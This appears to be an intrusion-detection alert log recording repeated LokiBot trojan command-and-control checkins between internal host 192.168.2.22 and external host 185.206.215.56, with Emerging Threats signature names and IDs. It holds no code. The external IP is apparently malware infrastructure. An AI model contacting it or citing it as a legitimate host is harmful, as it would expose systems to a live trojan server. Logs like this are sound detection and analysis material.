01/05/21-19:06:59.847928 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49301 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:00.058160 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49302 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:00.058160 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49302 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:00.058160 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49302 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:00.058160 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49302 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:00.228246 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49302 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:00.450812 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49303 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:00.450812 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49303 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:00.450812 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49303 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:00.450812 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49303 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:00.618919 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49303 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:00.828363 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49304 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:00.828363 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49304 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:00.828363 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49304 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:00.828363 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49304 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:00.993556 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49304 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:01.210699 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49305 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:01.210699 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49305 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:01.210699 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49305 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:01.210699 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49305 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:01.363213 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49305 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:01.575817 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49306 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:01.575817 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49306 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:01.575817 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49306 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:01.575817 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49306 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:01.750904 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49306 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:01.975553 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49307 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:01.975553 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49307 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:01.975553 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49307 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:01.975553 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49307 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:02.132845 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49307 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:02.334169 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49308 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:02.334169 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49308 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:02.334169 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49308 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:02.334169 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49308 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:02.488881 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49308 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:02.695433 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49309 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:02.695433 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49309 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:02.695433 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49309 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:02.695433 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49309 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:02.863488 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49309 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:03.081979 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49310 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:03.081979 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49310 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:03.081979 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49310 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:03.081979 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49310 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:03.240915 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49310 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:03.437460 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49311 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:03.437460 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49311 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:03.437460 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49311 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:03.437460 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49311 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:03.601073 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49311 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:03.817487 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49312 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:03.817487 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49312 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:03.817487 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49312 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:03.817487 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49312 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:03.979353 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49312 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:04.190227 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49313 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:04.190227 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49313 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:04.190227 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49313 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:04.190227 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49313 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:04.351678 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49313 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:04.554889 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49314 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:04.554889 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49314 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:04.554889 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49314 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:04.554889 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49314 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:04.731423 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49314 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:04.946051 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49315 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:04.946051 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49315 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:04.946051 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49315 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:04.946051 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49315 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:05.124758 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49315 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:05.334400 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49316 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:05.334400 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49316 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:05.334400 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49316 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:05.334400 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49316 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:05.505004 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49316 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:05.711231 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49317 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:05.711231 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49317 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:05.711231 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49317 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:05.711231 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49317 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:05.862498 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49317 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:06.056308 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49318 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:06.056308 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49318 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:06.056308 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49318 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:06.056308 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49318 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:06.254066 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49318 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:06.456725 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49319 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:06.456725 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49319 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:06.456725 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49319 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:06.456725 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49319 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:06.617598 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49319 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:06.823587 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49320 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:06.823587 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49320 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:06.823587 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49320 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:06.823587 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49320 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:06.974484 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49320 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:07.184056 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49321 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:07.184056 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49321 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:07.184056 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49321 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:07.184056 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49321 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:07.346312 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49321 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:07.553003 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49322 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:07.553003 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49322 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:07.553003 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49322 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:07.553003 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49322 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:07.742274 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49322 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:07.954109 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49323 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:07.954109 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49323 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:07.954109 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49323 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:07.954109 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49323 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:08.126146 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49323 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:08.324968 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49324 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:08.324968 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49324 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:08.324968 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49324 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:08.324968 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49324 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:08.523216 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49324 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:08.752322 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49325 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:08.752322 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49325 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:08.752322 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49325 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:08.752322 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49325 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:08.911141 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49325 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:09.107951 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49326 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:09.107951 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49326 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:09.107951 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49326 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:09.107951 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49326 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:09.274146 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49326 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:09.490262 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49327 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:09.490262 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49327 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:09.490262 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49327 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:09.490262 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49327 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:09.668226 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49327 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:09.873125 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49328 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:09.873125 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49328 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:09.873125 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49328 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:09.873125 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49328 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:10.024941 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49328 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:10.232858 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49329 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:10.232858 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49329 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:10.232858 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49329 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:10.232858 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49329 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:10.470073 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49329 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:10.663115 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49330 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:10.663115 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49330 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:10.663115 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49330 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:10.663115 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49330 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:10.820501 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49330 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:11.027929 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49331 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:11.027929 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49331 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:11.027929 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49331 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:11.027929 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49331 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:11.198428 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49331 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:11.409139 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49332 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:11.409139 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49332 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:11.409139 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49332 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:11.409139 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49332 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:11.568467 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49332 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:11.779641 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49333 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:11.779641 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49333 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:11.779641 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49333 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:11.779641 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49333 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:11.948839 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49333 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:12.151046 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49334 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:12.151046 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49334 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:12.151046 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49334 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:12.151046 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49334 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:12.322356 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49334 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:12.528628 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49335 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:12.528628 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49335 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:12.528628 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49335 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:12.528628 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49335 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:12.702702 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49335 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:12.913605 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49336 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:12.913605 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49336 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:12.913605 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49336 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:12.913605 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49336 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:13.081152 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49336 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:13.293357 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49337 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:13.293357 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49337 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:13.293357 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49337 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:13.293357 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49337 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:13.445018 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49337 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:07:13.661854 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49338 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:13.661854 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49338 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:13.661854 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49338 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:13.661854 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49338 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:07:13.836048 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49338 | 185.206.215.56 | 192.168.2.22 |
